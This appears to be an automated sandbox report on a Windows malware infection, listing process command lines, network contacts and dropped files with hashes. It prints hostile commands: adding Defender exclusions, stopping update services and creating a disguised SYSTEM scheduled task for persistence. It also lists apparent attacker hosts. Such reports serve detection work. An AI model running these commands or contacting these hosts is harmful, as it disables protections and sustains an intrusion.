"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,70378628735622860,10700745688261214048,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CFF3.exe

C:\Users\Admin\AppData\Local\Temp\CFF3.exe

C:\Users\Admin\AppData\Local\Temp\3F0A.exe

C:\Users\Admin\AppData\Local\Temp\3F0A.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\4257.exe

C:\Users\Admin\AppData\Local\Temp\4257.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\444C.exe

C:\Users\Admin\AppData\Local\Temp\444C.exe

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4976 -ip 4976

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 776

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bbtrhjj

C:\Users\Admin\AppData\Roaming\bbtrhjj

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 81.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
N/A 224.0.0.251:5353 udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 udp

Files

memory/1640-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1640-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3268-2-0x0000000002710000-0x0000000002726000-memory.dmp

memory/1640-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\62CC.exe

MD5 6e6ec8980dca281b098eb1bf5c3a6f99
SHA1 f74129680e21f2073f5f4c9d39b7120f72b0a208
SHA256 183e5a913132b82f31ae280e5a092ee98caf1118ffcff96f467cf5f0200ad7a9
SHA512 4056ae72f57130fe9f7bb03eddf8b0e85ecd2e00d93bddd9da7e325d7207eea8b94d3a66fbfa72bc51f02bcc96cb404f71c51045cf2a680f0123f528f728d00b

C:\Users\Admin\AppData\Local\Temp\62CC.exe

MD5 6e6ec8980dca281b098eb1bf5c3a6f99
SHA1 f74129680e21f2073f5f4c9d39b7120f72b0a208
SHA256 183e5a913132b82f31ae280e5a092ee98caf1118ffcff96f467cf5f0200ad7a9
SHA512 4056ae72f57130fe9f7bb03eddf8b0e85ecd2e00d93bddd9da7e325d7207eea8b94d3a66fbfa72bc51f02bcc96cb404f71c51045cf2a680f0123f528f728d00b

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\776F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\776F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

MD5 c6dcaa9b9d234fba471592f67bbed65c
SHA1 ddd52620fd70c51b5f604dfdffc83c02841898c6
SHA256 b2dd68e9fcfb768c675ee00730018d4847fe3df812837162a1b7ed483f6920a0
SHA512 1790d5dd3237991d90cf9290a3916aa554cafd5de27e877072d5af6733948a245380910593ae52ef4b61b0cff93874423016cb18a8b8b4640ddb1cef9824894b

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

MD5 c6dcaa9b9d234fba471592f67bbed65c
SHA1 ddd52620fd70c51b5f604dfdffc83c02841898c6
SHA256 b2dd68e9fcfb768c675ee00730018d4847fe3df812837162a1b7ed483f6920a0
SHA512 1790d5dd3237991d90cf9290a3916aa554cafd5de27e877072d5af6733948a245380910593ae52ef4b61b0cff93874423016cb18a8b8b4640ddb1cef9824894b

C:\Users\Admin\AppData\Local\Temp\8675.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\8675.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/4212-31-0x0000000000010000-0x000000000001A000-memory.dmp

memory/1452-33-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8F40.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/1452-36-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1452-38-0x0000000000400000-0x0000000000433000-memory.dmp

memory/220-39-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8F40.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Nw86rk.exe

MD5 3d269c5ae178789d40051b9b0daf7bc2
SHA1 bf9a901740b8fbc74c514382a18edd7eed0fea1f
SHA256 964a6712b6e047938eeca6ccac88b2e2085fdd64f3562893b5a5a42667982fbd
SHA512 01e7d6fbd6f87d6c7256130d4518659fac0b4c0a9e5459ec848fea0a4a1d50c9a8dd8fb8265536b7a907f81f873aa80774fab82df8558dbaa155d1d3ca5515b5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

MD5 693c6c86eb7499b1d4bb6bbc65db4c2d
SHA1 8cca414c23ea2daf31a1d94eb26fee12921c3f65
SHA256 9ef0773421dcfbaa3f1f98f3d569538a63adb0df6e68ce92cef6016baf181165
SHA512 5ed8f92f95ff2c63bb567fdf9a4b6117c4fbea0a9d73691dc402271f4c3bb623bd86417af034f23a5fedf37520e07da72284bffa735afcf0fc832ef553ab00d2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

MD5 693c6c86eb7499b1d4bb6bbc65db4c2d
SHA1 8cca414c23ea2daf31a1d94eb26fee12921c3f65
SHA256 9ef0773421dcfbaa3f1f98f3d569538a63adb0df6e68ce92cef6016baf181165
SHA512 5ed8f92f95ff2c63bb567fdf9a4b6117c4fbea0a9d73691dc402271f4c3bb623bd86417af034f23a5fedf37520e07da72284bffa735afcf0fc832ef553ab00d2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

MD5 eb0dd850df8c60600b6a0da57bc332c0
SHA1 205abf9bd526db8471a67ea9655996aebfe7a14c
SHA256 7311b1a64fd4ba02cb63567080ba6976c826244577a8bc685b06a843551ed3f4
SHA512 0059cc23beb8aa5985bc7838b2f94efe67947f782cbda3de7d15f5dae1069749d949415f702d1131b59c75f33450556abf1464bfda4ca6cb792450b6b49698a0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

MD5 eb0dd850df8c60600b6a0da57bc332c0
SHA1 205abf9bd526db8471a67ea9655996aebfe7a14c
SHA256 7311b1a64fd4ba02cb63567080ba6976c826244577a8bc685b06a843551ed3f4
SHA512 0059cc23beb8aa5985bc7838b2f94efe67947f782cbda3de7d15f5dae1069749d949415f702d1131b59c75f33450556abf1464bfda4ca6cb792450b6b49698a0

memory/4212-52-0x00007FFD11530000-0x00007FFD11FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

MD5 f1d32094252c66f6f22bd4c8c1acd996
SHA1 44edc6c2dc8f92290f29074abd25ea28bdc91393
SHA256 16dc74bd958a00a9a29845130529f12979f0e440e6e2139fcfdabe1dbfd0409c
SHA512 f44ce7e2ad437dc70eb7520c3776f62bfc7b642a652df138b162c63e71e2838ff1bf5fdeba6b2577ef11638945619a77d82a6382a220ca11536caa9c1ab9afef

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

MD5 f1d32094252c66f6f22bd4c8c1acd996
SHA1 44edc6c2dc8f92290f29074abd25ea28bdc91393
SHA256 16dc74bd958a00a9a29845130529f12979f0e440e6e2139fcfdabe1dbfd0409c
SHA512 f44ce7e2ad437dc70eb7520c3776f62bfc7b642a652df138b162c63e71e2838ff1bf5fdeba6b2577ef11638945619a77d82a6382a220ca11536caa9c1ab9afef

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

MD5 337bcef68d1505c1b939d9419b5ba2fa
SHA1 da7994b8e3413d1737f4487bbf2fd3d86e3298ab
SHA256 52067f320a43821e6a63a7aac95e9837f00b0ebe475b95c8974042f575fe6b8d
SHA512 bde954f048b432832482e388c6f31f83a5ecead26f152cce9b6964a00fcac16072583dccc5e7d1d86fcb2d0037426837dff71515d87451315ff11aab562e26ae

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

memory/220-78-0x0000000073870000-0x0000000074020000-memory.dmp

memory/1452-79-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

MD5 337bcef68d1505c1b939d9419b5ba2fa
SHA1 da7994b8e3413d1737f4487bbf2fd3d86e3298ab
SHA256 52067f320a43821e6a63a7aac95e9837f00b0ebe475b95c8974042f575fe6b8d
SHA512 bde954f048b432832482e388c6f31f83a5ecead26f152cce9b6964a00fcac16072583dccc5e7d1d86fcb2d0037426837dff71515d87451315ff11aab562e26ae

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/436-88-0x0000000000400000-0x0000000000433000-memory.dmp

memory/436-89-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1452-93-0x0000000000400000-0x0000000000433000-memory.dmp

memory/436-92-0x0000000000400000-0x0000000000433000-memory.dmp

memory/220-90-0x0000000007B50000-0x00000000080F4000-memory.dmp

memory/220-94-0x0000000007690000-0x0000000007722000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8DE3.tmp\8DE4.tmp\8DE5.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

MD5 4efc0d118a80d9e01765d803b8a2cf61
SHA1 70ef64b40c65b03a1e98afb0b842959464b30cae
SHA256 42e02486e940d9b85523ad4382cf67d2924f552bc15d919f77b9a3fd1dfa4f03
SHA512 f3b84c830c954c417a454028aad4b30949b41690e451dbd7aa58c40c73f49e41e3a14666090b76894ee8bbe7647e24797b32833417bc6959fa143ada8c59f948

memory/904-99-0x0000000073870000-0x0000000074020000-memory.dmp

memory/904-100-0x00000000009E0000-0x0000000000A1E000-memory.dmp

memory/220-102-0x0000000007650000-0x0000000007660000-memory.dmp

memory/904-101-0x0000000007750000-0x0000000007760000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1222f8c867acd00b1fc43a44dacce158
SHA1 586ba251caf62b5012a03db9ba3a70890fc5af01
SHA256 1e451cb9ffe74fbd34091a1b8d0ab2158497c19047b3416d89e55f498aae264a
SHA512 ef3f2fc1cedfc28fb530c710219b8e9eb833a2f344b91d3ffb2d82d7bbedbc223f4b60a38bea35b72eb706e4880ffcbb9256a9768f39bae95c5544be0f503916

memory/904-110-0x0000000007870000-0x000000000787A000-memory.dmp

